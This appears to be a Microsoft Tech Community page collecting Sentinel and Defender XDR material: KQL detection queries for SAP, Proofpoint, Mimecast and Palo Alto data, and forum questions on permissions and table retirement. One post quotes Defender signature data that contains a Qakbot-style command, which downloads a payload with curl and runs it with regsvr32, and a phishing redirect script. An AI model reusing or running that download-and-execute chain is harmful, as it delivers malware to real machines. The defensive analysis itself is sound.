SAPETDAlerts_CL | extend AlertId = tostring(coalesce(column_ifexists("AlertId",""), column_ifexists("id",""))), Severity = tostring(coalesce(column_ifexists("Severity",""), column_ifexists("severity",""))), SapUser = tostring(coalesce(column_ifexists("SAP_User",""), column_ifexists("User",""), column_ifexists("user",""))) | project TimeGenerated, AlertId, Severity, SapUser, * } .create-or-alter function with (folder="SOC/SAP") Normalize_Onapsis() { Onapsis_Defend_CL | extend FindingId = tostring(coalesce(column_ifexists("FindingId",""), column_ifexists("id",""))), Severity = tostring(coalesce(column_ifexists("Severity",""), column_ifexists("severity",""))), SapUser = tostring(coalesce(column_ifexists("SAP_User",""), column_ifexists("user",""))) | project TimeGenerated, FindingId, Severity, SapUser, * } Health/lag monitoring and anti-gap I monitor both connector health and ingestion delay. SentinelHealth is the native health table, and Microsoft provides a health workbook and a schema reference for the fields. let lookback=24h; union isfuzzy=true (ABAPAuditLog | extend T="ABAPAuditLog"), (SAPETDAlerts_CL | extend T="SAPETDAlerts_CL"), (Onapsis_Defend_CL | extend T="Onapsis_Defend_CL") | where TimeGenerated > ago(lookback) | summarize LastEvent=max(TimeGenerated), P95DelaySec=percentile(datetime_diff("second", ingestion_time(), TimeGenerated), 95), Events=count() by T Anti-gap scheduled-rule frame (Microsoft pattern): let ingestion_delay=10m; let rule_lookback=5m; ABAPAuditLog | where TimeGenerated >= ago(ingestion_delay + rule_lookback) | where ingestion_time() > ago(rule_lookback) SOC detections for ABAP privilege abuse, fraud/insider behavior, and audit readiness Privileged ABAP transaction monitoring ABAPAuditLog includes TransactionCode, User, SystemId, and terminal/IP fields, so I start with a curated high-risk tcode set and then add baselines. let PrivTCodes=dynamic(["SU01","PFCG","SM59","RZ10","SM49","SE37","SE16","SE16N"]); Normalize_ABAPAudit() | where TransactionCode in (PrivTCodes) | summarize Actions=count(), Ips=make_set(TerminalIpV6,5) by SystemId, User, TransactionCode, bin(TimeGenerated, 1h) | where Actions >= 3 Fraud/insider scenario: sensitive object change near privileged audit activity ABAPChangeDocsLog exposes ObjectClass, ObjectId, and change types; I correlate sensitive object changes to privileged transactions in a tight window. let w=10m; let Sensitive=dynamic(["BELEG","BPAR","PFCG","IDENTITY"]); ABAPChangeDocsLog | where ObjectClass in (Sensitive) | project ChangeTime=TimeGenerated, SystemId, User=tostring(column_ifexists("User","")), ObjectClass, ObjectId, TypeOfChange=tostring(column_ifexists("ItemTypeOfChange","")) | join kind=innerunique ( Normalize_ABAPAudit() | project AuditTime=TimeGenerated, SystemId, User, TransactionCode ) on SystemId, User | where AuditTime between (ChangeTime-w .. ChangeTime+w) | project ChangeTime, AuditTime, SystemId, User, ObjectClass, ObjectId, TransactionCode, TypeOfChange Audit-ready pipeline: monitoring continuity and configuration touchpoints I treat audit logging itself as a monitored control. A simple SOC-safe control is “volume drop” by system; it’s vendor-agnostic and catches pipeline breaks and deliberate suppression. Normalize_ABAPAudit() | summarize PerHour=count() by SystemId, bin(TimeGenerated, 1h) | summarize Avg=avg(PerHour), Latest=arg_max(TimeGenerated, PerHour) by SystemId | where Latest_PerHour < (Avg * 0.2) Where Onapsis/ETD are present, I increase fidelity by requiring “privileged ABAP activity” plus an external SAP-security product finding (field mappings are tenant-specific; normalize first): let win=1h; Normalize_ABAPAudit() | where TransactionCode in ("SU01","PFCG","SM59","SE16N") | join kind=leftouter (Normalize_Onapsis()) on $left.User == $right.SapUser | where isempty(FindingId) == false and TimeGenerated1 between (TimeGenerated .. TimeGenerated+win) | project TimeGenerated, SystemId, User, TransactionCode, FindingId, OnapsisSeverity=Severity Production validation, troubleshooting, and runbook For acceptance, I validate in this order: table creation, freshness/lag percentiles, connector health state, and cross-check of event counts against the upstream system for the same UTC window (where available). Connector health monitoring is built around SentinelHealth plus the Data collection health workbook. For SAP agentless ingestion, Microsoft states most troubleshooting happens in Integration Suite message logs—this is where I triage authentication/networking failures before tuning KQL. For Onapsis/SecurityBridge-style ingestion, I validate Entra app auth, DCR permission assignment (Monitoring Metrics Publisher), and a minimal ingestion test payload using the Logs Ingestion API tutorial flow. Operational runbook items I treat as non-optional: health alerts on connector failure and freshness drift; scheduled rule anti-gap logic; playbooks that capture evidence bundles (ABAPAuditLog slice + user context from ABAPUserDetails/ABAPAuthorizationDetails); DCR filters to reduce noise and cost; and change control for normalization functions and watchlists. SOC “definition of done” checklist (short): 1) Tables present and steadily ingesting; 2) P95 ingestion delay measured and rules use the anti-gap pattern; 3) SentinelHealth enabled with alerts; 4) SOC-owned normalization functions deployed; 5) at least one privileged-tcode rule + one change-correlation rule + one audit-continuity rule in production. Mermaid ingestion flow:140Views9likes0CommentsXDR RBAC missing Endpoint & Vulnerability Management
I've been looking at ways to provide a user with access to the Vulnerability Dashboard and associated reports without giving them access to anything else within Defender (Email, Cloud App etc) looking at the article https://learn.microsoft.com/en-us/defender-xdr/activate-defender-rbac it has a slider for Endpoint Management which I don't appear to have? I have business Premium licences which give me GA access to see the data so I know I'm licenced for it and it works but I can't figure out how to assign permissions. When looking at creating a custom permission here https://learn.microsoft.com/en-us/defender-xdr/custom-permissions-details#security-posture--posture-management it mentions Security Posture Management would give them Vulnerability Management Level Read which is what I'm after but that doesn't appear to be working. The test account i'm using to try this out just gets an error Error getting device data I'm assuming its because it doesn't have permissions of the device details?203Views0likes1CommentQuestion malware autodelete
A malware like Trojan:Win32/Wacatac.C!ml can download other malware, this other malware can perform the malicious action, this malware can delete itself and in the next scan of antivirus free this malware that deleted itself will not have any trace and will not be detected by the scan?155Views0likes2CommentsExplorer permission to download an email
Global Admin is allegedly not sufficient access to download an email. So I have a user asking for a copy of her emaill, and I'm telling her 'sorry, I don't have that permission', I'm only global admin' What? The documentation basically forces you to use the new terrible 'role group' system. I see various 'roles' that you need to add to a 'role group' in order to do this.. Some mention Preview, some mention Security Administrator, some mention Security Operator. I've asked copilot 100 different times, and he keeps giving me made up roles. But then linking to the made up role. How is such a basic functionality broken? It makes 0 sense. I don't want to submit this email - it's not malware or anything. I just want to download the **bleep** thing, and I don't want to have to go through the whole poorview process. This is really basic stuff. I can do this on about 10% of my GA accounts. There's no difference in the permissions - it just seems inconsistent.976Views3likes6CommentsNetworkSignatureInspected
Hi, Whilst looking into something, I was thrown off by a line in a device timeline export, with ActionType of NetworkSignatureInspected, and the content. I've read this article, so understand the basics of the function: Enrich your advanced hunting experience using network layer signals from Zeek I popped over to Sentinel to widen the search as I was initially concerned, but now think it's expected behaviour as I see the same data from different devices. Can anyone provide any clarity on the contents of AdditionalFields, where the ActionType is NetworkSignatureInspected, references for example CVE-2021-44228: ${token}/sendmessage`,{method:"post",%90%00%02%10%00%00%A1%02%01%10*%A9Cj)|%00%00$%B7%B9%92I%ED%F1%91%0B\%80%8E%E4$%B9%FA%01.%EA%FA<title>redirecting...</title><script>window.location.href="https://uyjh8.phiachiphe.ru/bjop8dt8@0uv0/#%90%02%1F@%90%02%1F";%90%00!#SCPT:Trojan:BAT/Qakbot.RVB01!MTB%00%02%00%00%00z%0B%01%10%8C%BAUU)|%00%00%CBw%F9%1Af%E3%B0?\%BE%10|%CC%DA%BE%82%EC%0B%952&&curl.exe--output%25programdata%25\xlhkbo\ff\up2iob.iozv.zmhttps://neptuneimpex.com/bmm/j.png&&echo"fd"&®svr32"%90%00!#SCPT:Trojan:HTML/Phish.DMOH1!MTB%00%02%00%00%00{%0B%01%10%F5):[)|%00%00v%F0%ADS%B8i%B2%D4h%EF=E"#%C5%F1%FFl>J<scripttype="text/javascript">window.location="https:// Defender reports no issues on the device and logs (for example DeviceNetworkEvents or CommonSecurityLog) don't return any hits for the sites referenced. Any assistance with rationalising this would be great, thanks.375Views0likes2CommentsSecurity Admin role replacement with Defender XDR
We currently have the Security Administrator role assigned to multiple users in our organization. We are considering replacing it with custom RBAC roles in Microsoft Defender XDR as described in https://learn.microsoft.com/en-us/defender-xdr/custom-roles Our goal is to provide these users full access to the Microsoft Defender security portal so they can respond to alerts and manage security operations. They do not require access to the Entra ID portal for tasks such as managing conditional access policies or authentication method policies. Can we completely remove the Security Administrator role and rely solely on the custom RBAC role in Defender XDR to meet these requirements?292Views0likes2CommentsWhere can I get the latest info on Advanced Hunting Table Retirement
First question - where can I find the latest info on the deprecation of advanced hunting tables? Background - I was developing some detections and as I was trying to decide on which table I should use I opened up the docs containing the schema for the `EntraIdSignInEvents` table (https://learn.microsoft.com/en-us/defender-xdr/advanced-hunting-entraidsigninevents-table) and was met by two ambiguous banners stating: "On December 9, 2025, the EntraIdSignInEvents table will replace AADSignInEventsBeta. This change will be made to remove the latter's preview status and to align it with the existing product branding. Both tables will coexist until AADSignInEventsBeta is deprecated after the said date. To ensure a smooth transition, make sure that you update your queries that use the AADSignInEventsBeta table to use EntraIdSignInEvents before the previously mentioned date. Your custom detections will be updated automatically and won't require any changes." "Some information relates to prereleased product that may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here. Customers need to have a Microsoft Entra ID P2 license to collect and view activities for this table." This made me very confused as I still have data from AADSignInEventsBeta on my tenant from today. I'm not sure what this means and I'm hoping to get some clear info on table retirement.193Views0likes2CommentsInvalidating kerberos tickets via XDR?
Since we have alerts every now and then, regarding suspected Pass the Ticket-incidents, I want to know if there's a way to make a user's kerberos ticket invalid? Like we have the "Revoke Session" in Entra ID, is there anything similar that we can do in XDR?56Views0likes1CommentIntegrating Proofpoint and Mimecast Email Security with Microsoft Sentinel
Microsoft Sentinel can ingest rich email security telemetry from Proofpoint and Mimecast to power advanced phishing detection. The Proofpoint On Demand (POD) Email Security and Proofpoint Targeted Attack Protection (TAP) connectors pull threat logs (quarantines, spam, phishing attempts) and user click data into Sentinel. Similarly, the Mimecast Secure Email Gateway connector ingests detailed mail flow and targeted-threat logs (attachment/URL scans, impersonation events). These integrations use Azure-hosted ingestion (via Logic Apps or Azure Functions) and the new Codeless Connector framework to call vendor APIs on a schedule. The result is a consolidated dataset in Sentinel’s Log Analytics, enabling correlated alerting and hunting across email, identity, and endpoint signals. Figure: Phishing emails are processed by Mimecast’s gateway and Proofpoint POD/TAP services. Security logs (delivery/quarantine events, malicious attachments/links, user clicks) flow into Microsoft Sentinel. In Sentinel, these mail signals are correlated with identity (Azure AD), endpoint (Defender) and network telemetry for end-to-end phishing detection. Proofpoint POD (Email Protection) Connector The Proofpoint POD connector ingests core email protection logs. It creates two tables, ProofpointPODMailLog_CL and ProofpointPODMessage_CL. These logs include per-message metadata (senders, recipients, subject, message size, timestamps), threat scores (spamScore, phishScore, malwareScore, impostorScore), and attachment details (number of attachments, names, hash values and sandbox verdicts). Quarantine actions are recorded (quarantine folder/rule) and malicious indicators (URL or file hash) and campaign IDs are tagged in the threatsInfoMap field. For example, each ProofpointPODMessage_CL record may carry a sender_s (sender email domain hashed), recipient list, subject, and any detected threat type (Phish/Malware/Spam/Impostor) with associated threat hash or URL. Deployment: Proofpoint POD uses Sentinel’s codeless connector (an Azure Function behind the scenes). You must provide Proofpoint API credentials (Cluster ID and API token) in the connector UI. The connector periodically calls the Proofpoint SIEM API to fetch new log events (typically in 1–2 hour batches). The data lands in the above tables. (Older custom logic-app approaches similarly parse JSON output from the /v2/siem/messages endpoints.) Proofpoint TAP (Targeted Attack Protection) Connector Proofpoint TAP provides user-click and message-delivery events. Its connector creates four tables: ProofPointTAPMessagesDeliveredV2_CL, ProofPointTAPMessagesBlockedV2_CL, ProofPointTAPClicksPermittedV2_CL, and ProofPointTAPClicksBlockedV2_CL. The message tables report emails with detected threats (URL or attachment defense) that were delivered or blocked by TAP. They include the same fields as POD (message GUID, sender, recipients, subject, threat campaign ID, scores, attachments info). The click tables log when users click on URLs: each record has the URL, click timestamp (clickTime), the user’s IP (clickIP), user-agent, the message GUID, and the threat ID/category. These fields allow you to see who clicked which malicious link and when. As the connector description notes, these logs give “visibility into Message and Click events in Microsoft Sentinel” for hunting. Deployment: The TAP connector also uses the codeless framework. You supply a TAP API service principal and secret (proofpoint SIEM API credentials) in the Sentinel content connector. The function app calls TAP’s /v2/siem/clicks/blocked, /permitted, /messages/blocked, and /delivered endpoints. The Proofpoint SIEM API limits queries to 1-hour windows and 7-day history, with no paging (all events in the interval are returned). (A Logic App approach could also be used, as shown in the Tech Community blog: one HTTP GET per event type and a JSON Parse before sending to Log Analytics.) Mimecast Secure Email Gateway Connector The Mimecast connector ingests the Secure Email Gateway (SEG) logs and targeted-threat (TTP) logs. Inbound, outbound and internal mail events from the Mimecast MTA (receipt, processing, delivery stages) are pulled via the API. Typical fields include the unique message ID (aCode), sender, recipient, subject, attachment count/names, and the policy actions or holds (e.g. spam quarantine). For example, the Mimecast “Process” log shows AttCnt, AttNames, and if the message was held (Hld) for review. Delivery logs include the success/failure and TLS details. In addition, Mimecast TTP logs are collected: URL Protect logs (when a user clicks a blocked URL) include the clicked URL (url), category (urlCategory), sender/recipient, and block reason. Impersonation Protect logs capture spoofing detections (e.g. if an internal name is impersonated), with fields like Sender, Recipient, Definition and Action (hold/quarantine). Attachment Protect logs record malicious file detections (filename, hash, threat type). Deployment: Like Proofpoint, Mimecast’s connector uses Azure Functions via the Sentinel content hub. You install the Mimecast solution, open the connector page, then enter Azure app credentials and Mimecast API keys (API Application ID/Key and Access/Secret for the service account). As shown in the deployment guide, you must provide the Azure Subscription, Resource Group, Log Analytics Workspace and the Azure Client (App) ID, Tenant ID and Object ID of the admin performing the setup. On the Mimecast side, you supply the API Base URL (regional), App ID/Secret and user Access/Secret. The connector creates a Function App that polls Mimecast’s SIEM APIs on a cron schedule (default every 30 minutes). You can optionally specify a start date for backfilling up to 7 days of logs. The default tables are MimecastSIEM_CL (for email flow logs) and MimecastDLP_CL (for DLP/TTP events), though custom names can be set. Ingestion Considerations Data Latency: All these connectors are pull-based and typically run on a schedule (often 30–60 minutes). For example, the Proofpoint POD docs note hourly log increments, and Mimecast logs are aggregated every 30 minutes. Expect a delay of up to an hour or more from event occurrence to Sentinel ingestion. Schema Nuances: The APIs often return nested arrays and optional fields. For instance, the Proofpoint blog warns that some JSON fields can be null or vary in type, so the parse schema should account for all possibilities. Similarly, Mimecast logs come in pipe-delimited or JSON format, with values sometimes empty (e.g. no attachments). In KQL, use tostring() or parse_json() on the raw _CL columns, and mv-expand on any multivalue fields (like message parts or threat lists). Table Names: Use the connector’s tables as listed. For Proofpoint: ProofpointPODMailLog_CL and ProofpointPODMessage_CL; for TAP: ProofPointTAPMessagesDeliveredV2_CL, ProofPointTAPMessagesBlockedV2_CL, ProofPointTAPClicksPermittedV2_CL, ProofPointTAPClicksBlockedV2_CL. For Mimecast SEG/TTP: MimecastSIEM_CL (seg logs) and MimecastDLP_CL (TTP logs). API Behavior: The Proofpoint TAP API has no paging. Be aware of timezones (Proofpoint uses UTC) and use the Sentinal ingestion TimeGenerated or event timestamp fields for binning. Detection Engineering and Correlation To detect phishing effectively, we correlate these email logs with identity, endpoint and intel data: Identity (Azure AD): Mail logs contain recipient addresses and (hashed) sender user parts. A common tactic is to correlate SMTP recipients or sender domains with Azure AD user records. For example, join TAP clicks by recipient to the user’s UPN. The Proofpoint logs also include the clicker’s IP (clickIP); we can match that to Azure AD sign-in logs or VPN logs to find which device/location clicked a malicious link. Likewise, anomalous Azure AD sign-ins (impossible travel, MFA failure) after a suspicious email can strengthen the case. Endpoints (Defender): Once a user clicks a bad link or opens a malicious attachment (captured in TAP or Mimecast logs), watch for follow-on behaviors. For instance, use Sentinel’s DeviceSecurityEvents or DeviceProcessEvents to see if that user’s machine launched unusual processes. The threatID or URL hash from email events can be looked up in Defender’s file data. Correlate by username (if available) or IP: if the email log shows a link click from IP X, see if any endpoint alerts or logon events occurred from X around the same time. As the Mimecast integration touts, this enables “correlation across Mimecast events, cloud, endpoint, and network data”. Threat Intelligence: Use Sentinel’s ThreatIntelligenceIndicator tables or Microsoft’s TI feeds to tag known bad URLs/domains in the email logs. For example, join ProofPointTAPClicksBlockedV2_CL on the clicked url against ThreatIntelligenceIndicator (type=URL) to automatically flag hits. Proofpoint’s logs already classify threats (malware/phish) and provide a threatID; one can enrich that with external intel (e.g. check if the hash appears in TI feeds). Mimecast’s URL logs include a urlCategory field, which can be mapped to known malicious categories. Automated playbooks can also pull Intel: e.g. use Sentinel’s TI REST API or Azure Sentinel watchlists containing phishing domains to annotate events. In summary, a robust detection strategy might look like: (1) Identify malicious email events (high phish scores, quarantines, URL clicks). (2) Correlate these events by user with Azure AD logs (did the user log in from a new IP after a phish click?). (3) Correlate with endpoint alerts (Defender found malware on that device). (4) Augment with threat intelligence lookups on URLs and attachments from the email logs. By linking the Proofpoint/Mimecast signals to identity and endpoint events, one can detect the full attack chain from email compromise to endpoint breach. KQL Query Here are representative Kusto queries for common phishing scenarios (adapt table/field names as needed): Malicious URL Click Detection: Identify users who clicked known-malicious URLs. For example, join TAP click logs to TI indicators:This flags any permitted click where the URL matches a known threat indicator. Alternatively, aggregate by domain: let TI = ThreatIntelligenceIndicator | where Active == true and _EntityType == "URL"; ProofPointTAPClicksPermittedV2_CL | where url_s != "" | project ClickTime=TimeGenerated, Recipient=recipient_s, URL=url_s, SenderIP=senderIP_s | join kind=inner TI on $left.URL == TI._Value | project ClickTime, Recipient, URL, Description=TI.Description This flags any permitted click where the URL matches a known threat indicator. Alternatively, aggregate by domain: ProofPointTAPClicksPermittedV2_CL | extend clickedDomain = extract(@"https?://([^/]+)", 1, url_s) | summarize ClickCount=count() by clickedDomain | where clickedDomain has "maliciousdomain.com" or clickedDomain has "phish.example.com" Quarantine Spike (Burst) Detection: Detect sudden spikes in quarantined messages. For example, using POD mail log:This finds hours with an unusually high number of held (quarantined) emails, which may indicate a phishing campaign. You could similarly use ProofPointTAPMessagesBlockedV2_CL. ProofpointPODMailLog_CL | where action_s == "Held" | summarize HeldCount=count() by bin(TimeGenerated, 1h) | order by TimeGenerated desc | where HeldCount > 100 Targeted User Phishing: Find if a specific user received multiple malicious emails. E.g., for user email address removed for privacy reasons:This lists recent phish attempts targeting Username. You might also join with TAP click logs to see if she clicked anything. ProofpointPODMessage_CL | where recipient has "email address removed for privacy reasons" | where array_length(threatsInfoMap) > 0 and threatsInfoMap_classification_s == "Phish" | project TimeGenerated, sender_s, subject_s, threat=threatsInfoMap_threat_s Campaign-Level Analysis: Group emails by Proofpoint campaign ID to see scope of each campaign:This shows each campaign ID with how many unique recipients were hit and one example subject. Combining TAP and POD tables on GUID_s or QID_s can further link click events back to the originating message/campaign. ProofpointPODMessage_CL | mv-expand threatsInfoMap | summarize Recipients=make_set(recipient), Count=dcount(recipient) by CampaignID=threatsInfoMap_campaignId_s | project CampaignID, RecipientCount=Count, Recipients, SampleSubject=any(subject_s) Each query can be refined (for instance, filtering only within a recent time window) and embedded in Sentinel Analytics rules or hunting. The key is using the connectors’ fields – URLs, sender/recipient addresses, campaign IDs – to pivot between email data and other security signals.706Views8likes0CommentsCloud Posture + Attack Surface Signals in Microsoft Sentinel (Prisma Cloud + Cortex Xpanse)
Microsoft expanded Microsoft Sentinel’s connector ecosystem with Palo Alto integrations that pull cloud posture, cloud workload runtime, and external attack surface signals into the SIEM, so your SOC can correlate “what’s exposed” and “what’s misconfigured” with “what’s actively being attacked.” Specifically, the Ignite connectors list includes Palo Alto: Cortex Xpanse CCF and Palo Alto: Prisma Cloud CWPP. Why these connectors matter for Sentinel detection engineering Traditional SIEM pipelines ingest “events.” But exposure and posture are just as important as the events—because they tell you which incidents actually matter. Attack surface (Xpanse) tells you what’s reachable from the internet and what attackers can see. Posture (Prisma CSPM) tells you which controls are broken (public storage, permissive IAM, weak network paths). Runtime (Prisma CWPP) tells you what’s actively happening inside workloads (containers/hosts/serverless). In Sentinel, these become powerful when you can join them with your “classic” telemetry (cloud activity logs, NSG flow logs, DNS, endpoint, identity). Result: fewer false positives, faster triage, better prioritization. Connector overview (what each one ingests) 1) Palo Alto Prisma Cloud CSPM Solution What comes in: Prisma Cloud CSPM alerts + audit logs via the Prisma Cloud CSPM API. What it ships with: connector + parser + workbook + analytics rules + hunting queries + playbooks (prebuilt content). Best for: Misconfig alerts: public storage, overly permissive IAM, weak encryption, risky network exposure. Compliance posture drift + audit readiness (prove you’re monitoring and responding). 2) Palo Alto Prisma Cloud CWPP (Preview) What comes in: CWPP alerts via Prisma Cloud API (Compute/runtime side). Implementation detail: Built on Codeless Connector Platform (CCP). Best for: Runtime detections (host/container/serverless security alerts) “Exploit succeeded” signals that you need to correlate with posture and exposure. 3) Palo Alto Cortex Xpanse CCF What comes in: Alerts logs fetched from the Cortex Xpanse API, ingested using Microsoft Sentinel Codeless Connector Framework (CCF). Important: Supports DCR-based ingestion-time transformations that parse to a custom table for better performance. Best for: External exposure findings and “internet-facing risk” detection Turning exposure into incidents only when the asset is critical / actively targeted. Reference architecture (how the data lands in Sentinel) Here’s the mental model you want for all three: flowchart LR A[Palo Alto Prisma Cloud CSPM] -->|CSPM API: alerts + audit logs| S[Sentinel Data Connector] B[Palo Alto Prisma Cloud CWPP] -->|Prisma API: runtime alerts| S C[Cortex Xpanse] -->|Xpanse API: exposure alerts| S S -->|CCF/CCP + DCR Transform| T[(Custom Tables)] T --> K[KQL Analytics + Hunting] K --> I[Incidents] I -->P[SOAR Playbooks] K --> W[Workbooks / Dashboards] Key design point: Xpanse explicitly emphasizes DCR transformations at ingestion time, use that to normalize fields early so your queries stay fast under load. Deployment patterns (practical, SOC-friendly setup) Step 0 — Decide what goes to “analytics” vs “storage” If you’re using Sentinel’s data lake strategy, posture/exposure data is a perfect candidate for longer retention (trend + audit), while only “high severity” may need real-time analytics. Step 1 — Install solutions from Content Hub Install: Palo Alto Prisma Cloud CSPM Solution Palo Alto Prisma Cloud CWPP (Preview) Palo Alto Cortex Xpanse CCF Step 2 — Credentials & least privilege Create dedicated service accounts / API keys in Palo Alto products with read-only scope for: CSPM alerts + audit CWPP alerts Xpanse alerts/exposures Step 3 — Validate ingestion (don’t skip this) In Sentinel Logs: Locate the custom tables created by each solution (Tables blade). Run a basic sanity query: “All events last 1h” “Top 20 alert types” “Distinct severities” Tip: Save “ingestion smoke tests” as Hunting queries so you can re-run them after upgrades. Step 4 — Turn on included analytics content (then tune) The Prisma Cloud CSPM solution comes with multiple analytics rules, hunting queries, and playbooks out of the box—enable them gradually and tune thresholds before going wide. Detection engineering: high-signal correlation recipes Below are patterns that consistently outperform “single-source alerts.” I’m giving them as KQL templates using placeholder table names because your exact custom table names/columns are workspace-dependent (you’ll see them after install). Recipe 1 — “Internet-exposed + actively probed” (Xpanse + network logs) Goal: Only fire when exposure is real and there’s traffic evidence. let xpanse = <XpanseTable> | where TimeGenerated > ago(24h) | where Severity in ("High","Critical") | project AssetIp=<ip_field>, Finding=<finding_field>, Severity, TimeGenerated; let net = <NetworkFlowTable> | where TimeGenerated > ago(24h) | where Direction == "Inbound" | summarize Hits=count(), SrcIps=make_set(SrcIp, 50) by DstIp; xpanse | join kind=inner (net) on $left.AssetIp == $right.DstIp | where Hits > 50 | project TimeGenerated, Severity, Finding, AssetIp, Hits, SrcIps Why it works: Xpanse gives you exposure. Flow/WAF/Firewall gives you intent. Recipe 2 — “Misconfiguration that creates a breach path” (CSPM + identity or cloud activity) Goal: Prioritize posture findings that coincide with suspicious access or admin changes. let posture = <PrismaCSPMTable> | where TimeGenerated > ago(7d) | where PolicySeverity in ("High","Critical") | where FindingType has_any ("Public", "OverPermissive", "NoMFA", "EncryptionDisabled") | project ResourceId=<resource_id>, Finding=<finding>, PolicySeverity, FirstSeen=TimeGenerated; let activity = <CloudActivityTable> | where TimeGenerated > ago(7d) | where OperationName has_any ("RoleAssignmentWrite","SetIamPolicy","AddMember","CreateAccessKey") | project ResourceId=<resource_id>, Actor=<caller>, OperationName, TimeGenerated; posture | join kind=inner (activity) on ResourceId | project PolicySeverity, Finding, OperationName, Actor, FirstSeen, TimeGenerated | order by PolicySeverity desc, TimeGenerated desc Recipe 3 — “Runtime alert on a workload that was already high-risk” (CWPP + CSPM) Goal: Raise severity when runtime alerts occur on assets with known posture debt. let risky_assets = <PrismaCSPMTable> | where TimeGenerated > ago(30d) | where PolicySeverity in ("High","Critical") | summarize RiskyFindings=count() by AssetId=<asset_id>; <CWPPTable> | where TimeGenerated > ago(24h) | project AssetId=<asset_id>, AlertName=<alert>, Severity=<severity>, TimeGenerated, Details=<details> | join kind=leftouter (risky_assets) on AssetId | extend RiskScore = coalesce(RiskyFindings,0) | order by Severity desc, RiskScore desc, TimeGenerated desc SOC outcome: same runtime alert, different priority depending on posture risk. Operational (in real life) 1) Normalize severities early If Xpanse is using DCR transforms (it is), normalize severity to a consistent enum (“Informational/Low/Medium/High/Critical”) to simplify analytics. 2) Deduplicate exposure findings Attack surface tools can generate repeated findings. Use a dedup function (hash of asset + finding type + port/service) and alert only on “new or changed exposure.” 3) Don’t incident-everything Treat CSPM findings as: Incidents only when: critical + reachable + targeted OR tied to privileged activity Tickets when: high risk but not active Backlog when: medium/low with compensating controls 4) Make SOAR “safe by default” Automations should prefer reversible actions: Block IP (temporary) Add to watchlist Notify owners Open ticket with evidence bundle …and only escalate to destructive actions after confidence thresholds.280Views8likes0Comments
Events
Recent Blogs
- Every breach has one thing in common: an identity was exploited. Attackers have learned that identity is the fastest path to lateral movement and escalation. The challenge for defenders is that today...Mar 20, 20261.4KViews5likes0Comments
- Modern attacks increasingly exploit the sprawl of today’s digital environments. In the identity space alone, over half of today’s organizations say each person now has more than 21 distinct accounts....Mar 20, 20261.1KViews0likes0Comments